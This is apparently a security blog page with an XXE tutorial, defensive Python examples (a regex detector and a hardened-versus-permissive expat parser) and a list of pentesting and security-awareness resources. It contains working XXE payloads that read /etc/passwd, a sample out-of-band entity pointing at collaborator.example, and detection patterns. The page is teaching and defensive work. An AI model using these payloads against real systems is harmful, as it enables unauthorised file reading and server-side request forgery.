XXE Attack

What is XXE attack?

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers and XML data. It often allows an attacker to interact with any backend or external systems that the application itself can access, and can allow the attacker to read files on that system. Attackers can also cause a Denial of Service (DoS) or use XXE to perform Server-Side Request Forgery (SSRF), inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).

1) In an in-band XXE attack, the attacker receives an immediate response to the XXE payload.

2) In an out-of-band XXE attack (also called blind XXE), there is no immediate response from the web application, and the attacker has to make the output of their XXE payload reach some other file or a server they control.

When is the application vulnerable?

Applications, and in particular XML-based web services or downstream integrations, might be vulnerable to attack if:

  • The application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents that are then parsed by an XML processor.
  • Any of the XML processors in the application or in SOAP-based web services has document type definitions (DTDs) enabled. As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the OWASP Cheat Sheet ‘XXE Prevention’.
  • The application uses SAML for identity processing within federated security or single sign-on (SSO). SAML uses XML for identity assertions and may be vulnerable.
  • The application uses SOAP prior to version 1.2; it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.
  • Being vulnerable to XXE attacks likely means that the application is also vulnerable to denial-of-service attacks, including the Billion Laughs attack.

Before we move on to XXE exploitation, we need to understand XML properly.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data.

Why do we use XML?

  • XML is platform-independent and programming-language-independent, so it can be used on any system and survives technology changes when they happen.
  • The data stored and transported using XML can be changed at any point in time without affecting the data presentation.
  • XML allows validation using DTD and Schema. This validation ensures that the XML document is free from any syntax error.
  • XML simplifies data sharing between various systems because of its platform-independent nature. XML data doesn’t require any conversion when transferred between different systems.

What are XML entities?

XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built into the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

What is document type definition?

The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an “internal DTD”), can be loaded from elsewhere (known as an “external DTD”), or can be a hybrid of the two.

What are XML custom entities?

XML allows custom entities to be defined within the DTD. For example:

<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>

This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: “my entity value”.

What are XML external entities?

XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.

The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>

The URL can use the file:// protocol, so external entities can also be loaded from a file. For example:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

XML external entities provide the primary means by which XML external entity attacks arise.

Exploiting XXE

To perform an XXE injection attack that retrieves an arbitrary file from the server’s filesystem, you need to modify the submitted XML in two ways:

  • Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
  • Edit a data value in the XML that is returned in the application’s response, to make use of the defined external entity.

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?>
<userinfor><name>Leiz</name></userinfor>

The application has no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<userinfor><name>&xxe;</name></userinfor>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the name value. This causes the application’s response to include the contents of the file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

NOTE:

With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application’s response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and checking whether it appears within the response.

How to find and test for XXE vulnerabilities?

The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite’s web vulnerability scanner.

Manually testing for XXE vulnerabilities generally involves:

  • Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application’s response.
  • Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
  • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.
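The three manual tests above all rely on specific constructs in the submitted XML (a DOCTYPE with an external entity, a parameter entity pointing at an out-of-band host, an XInclude element). From the defender's side, those same constructs are what a WAF rule or a log-review job should flag for triage. The Python below is an added example written for this page, not code from the original post or from PortSwigger/Burp; the request bodies are constructed samples and the indicator names are my own.

```python
import re

# Constructed request bodies, as a WAF or a log-review job would see them.
# These are made-up samples for this article, not captured traffic.
SAMPLE_REQUESTS = [
    ("req-1", '<?xml version="1.0"?><userinfor><name>Leiz</name></userinfor>'),
    ("req-2", '<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
              '<userinfor><name>&xxe;</name></userinfor>'),
    ("req-3", '<!DOCTYPE foo [ <!ENTITY % ext SYSTEM "http://collaborator.example/x.dtd"> %ext; ]>'
              '<userinfor/>'),
    ("req-4", '<userinfor xmlns:xi="http://www.w3.org/2001/XInclude">'
              '<name><xi:include href="file:///etc/passwd" parse="text"/></name></userinfor>'),
    ("req-5", '<order><productId>381</productId></order>'),
]

# One regex per construct the manual tests rely on. XML keywords are
# case-sensitive, but matching is kept case-insensitive on purpose: for
# triage a false positive is cheaper than missing input aimed at a lenient parser.
INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "external_entity": re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    "xinclude": re.compile(r"<\w+:include\b[^>]*\bhref\s*=", re.I),
    "file_scheme": re.compile(r"\bfile://", re.I),
}


def classify(body):
    """Names of the indicators present in one request body, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(body))


def scan(requests):
    """Map request id -> indicator list for every body that trips a rule."""
    findings = {}
    for request_id, body in requests:
        hits = classify(body)
        if hits:
            findings[request_id] = hits
    return findings


if __name__ == "__main__":
    for request_id, hits in scan(SAMPLE_REQUESTS).items():
        print(request_id, "->", ", ".join(hits))
```

Requests 1 and 5 are clean, request 2 matches the in-band file-retrieval test, request 3 matches the blind (parameter entity to an external host) test, and request 4 matches the XInclude test. A DOCTYPE on its own can be legitimate in some integrations, so treat the output as a triage list rather than a block decision; the external_entity, parameter_entity and xinclude indicators are the ones that deserve a closer look.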

How to prevent XXE vulnerabilities?

Preventing XXE requires:

  • Whenever possible, using less complex data formats such as JSON, and avoiding serialization of sensitive data.
  • Patching or upgrading all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
  • Disabling XML external entity and DTD processing in all XML parsers in the application, as per the OWASP Cheat Sheet ‘XXE Prevention’.
  • Implementing positive (“whitelisting”) server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.
  • Verifying that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.
  • Using SAST tools, which can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.
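To make the “disable DTD processing” advice concrete, and to show what actually happens to the &xxe; reference in the exploitation example above, here is an added Python example (not code from the original post, nor from Burp or OWASP) built on the standard library's xml.parsers.expat module. It parses the article's document and its /etc/passwd payload two ways: a permissive parser whose external-entity hook behaves like a carelessly configured processor, handing the SYSTEM URL to a resolver and splicing the result into the document (the resolver here is a stand-in that only records the URL and returns a constructed string, so nothing is read from disk), and a hardened parser that rejects any DOCTYPE, so no entity can be declared at all. The function names, SecurityViolation and fake_resolver are my own.

```python
import xml.parsers.expat as expat

# Constructed inputs (copied from the article's example, not captured traffic):
# the benign document and the file-retrieval payload.
BENIGN = '<?xml version="1.0" encoding="UTF-8"?><userinfor><name>Leiz</name></userinfor>'
PAYLOAD = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
           '<userinfor><name>&xxe;</name></userinfor>')


class SecurityViolation(Exception):
    """Raised by the hardened parser when the document carries a DTD."""


def fake_resolver(system_id):
    """Stand-in for the file/network fetch a real processor would perform.
    It never touches the filesystem; it only returns constructed text."""
    return "CONSTRUCTED CONTENTS OF " + system_id


def parse_permissive(xml_text, resolver=fake_resolver):
    """Parse like a carelessly configured processor: every external entity
    reference is resolved through `resolver` and the result is spliced into
    the document as ordinary character data.
    Returns (text found inside the elements, list of URLs the parser asked for)."""
    parser = expat.ParserCreate()
    chunks, requested = [], []
    parser.CharacterDataHandler = chunks.append

    def on_external_entity(context, base, system_id, public_id):
        requested.append(system_id)
        # expat parses the entity's replacement text with a child parser; the
        # fetched text therefore lands in `chunks` exactly where &xxe; stood in <name>.
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = chunks.append
        child.Parse(resolver(system_id), True)
        return 1  # 1 = continue parsing the parent document

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks), requested


def parse_hardened(xml_text):
    """Parse with DTD processing disabled: a DOCTYPE of any kind aborts the
    parse, which also rules out internal entity expansion (Billion Laughs)."""
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise SecurityViolation("DOCTYPE declaration rejected: " + name)

    def on_external_entity(context, base, system_id, public_id):
        return 0  # belt and braces: returning 0 makes expat fail the parse

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


if __name__ == "__main__":
    print("benign, hardened   :", parse_hardened(BENIGN))
    text, urls = parse_permissive(PAYLOAD)
    print("payload, permissive:", text, "| resolver was asked for", urls)
    try:
        parse_hardened(PAYLOAD)
    except SecurityViolation as exc:
        print("payload, hardened  :", exc)
```

The permissive path shows the whole mechanism in one place: the attacker controls the SYSTEM URL, the parser hands it to the resolver, and whatever comes back becomes the <name> value that the application later echoes. The hardened path fails at the DOCTYPE itself, before any entity is declared, which is the same effect the OWASP cheat sheet's per-library settings (for example disallowing DOCTYPE declarations in Java's DocumentBuilderFactory) aim for; rejecting the whole DTD is simpler to reason about than trying to allow “safe” entities.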

Practice

With the labs below, you can create an account and try it yourself.

https://portswigger.net/web-security/xxe

Have a nice day, guys.

Blogs You Should Know For Penetration Testing

After a long time, I researched and chose security as my career path.

How to get started in security is a common question nowadays. It was the first question I had when I chose this path, and when I asked people nobody could answer it. I tried to research and read a lot of books, blogs and other material related to security. While I was doing that research, someone messaged me and asked me that same first question. So I thought I’d rather write a blog post and direct all those beginners to it.

I’ve been in the security field for 3 years now. Still, there is so much to learn each and every day; I’m not an expert yet and this post is NOT expert advice. I am just sharing what I’ve achieved in the past 3 years and what I keep doing to improve my skills.

I read everything in the list below every day, and I think it is helpful for anyone starting out in this field:

Pentester land

Detectify

Bug bounty from medium

bug bounty note

rapid7 blog

Here is a list of tools you should know.

Choose one that is helpful and learn to use it as well as you can.

http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html

Public awareness and prevention guides by Europol.

Top tips for staying secure online by the UK National Cyber Security Centre (NCSC).

Watch Your Hack by Daniel Verlaan.

Security awareness and tips by The AntiSocial Engineer.

Security for everyone by Andy Gill.

A guide to protect your digital self by Francesco Cipollone.

End user security cheatsheet by Sean Wright.

Safeonweb a security awareness site from the Belgian government.

Cybersec 101, a security awareness site for beginners.

Decent Security by SwiftOnSecurity.

Cyber aware online by Martijn Kamminga.

Information security for (investigative) journalists (Dutch and English pdf available) by Silkie Carlo and Arjen Kamphuis.

Stop Think Connect. General security awareness in different languages by STOPTHINKCONNECT.

Cybersecurity for small business by FTC

Security tips by US-CERT

PASSWORDS

How to create strong passwords

There’s no excuse for password reuse, or is there?

PASSWORD MANAGERS

Some tips for choosing a password manager

Browser password managers – a good idea?

Why password managers are not the best solution for everyone

Some common misconceptions about password managers and their alternatives

MULTI FACTOR AUTHENTICATION

Multi factor authentication (MFA) for beginners by Tanya Janca.

Two-Factor Authentication with Yubikey – What is it? by Alex Harmon

My own blogs:

Better account security with multi-factor authentication

Enable two-factor authentication but don’t lose access to your accounts

RANSOMWARE

The No More Ransom website can help to get your files back when they are encrypted after a ransomware attack. This website also contains a lot of practical advice to protect against ransomware.

My own blog:

Ransomware 101: How to protect against ransomware and what to do after a ransomware attack?

BACKUPS

Easy, Cheap And Secure Backup With Google Cloud by Scott Helme

Securely backup your data: What does a good backup strategy look like? In this blog I also show a possible practical implementation.

SOFTWARE UPDATES

Why you should keep your software up to date

ONLINE SECURITY FOR CHILDREN

Help your children stay safe online

DATA BREACH DETECTION

How to monitor your data breach exposure: in this blog I describe several tools that can help to detect if your personal data is stolen.

SCAMS AND FRAUD

How to prevent online shopping fraud

Tech support scams – what you need to know

Sextortion scams – what you need to know

How to stay safe on social media

SECURITY TOOLS

Before you click a link you want to check it with a scanning tool. A few easy to use tools are urlscan.io and virustotal. Here’s a blog (in Dutch) on how to check if links are secure.

INTERNET OF THINGS (IOT) SECURITY

The security risks of internet connected devices

Thanks for reading!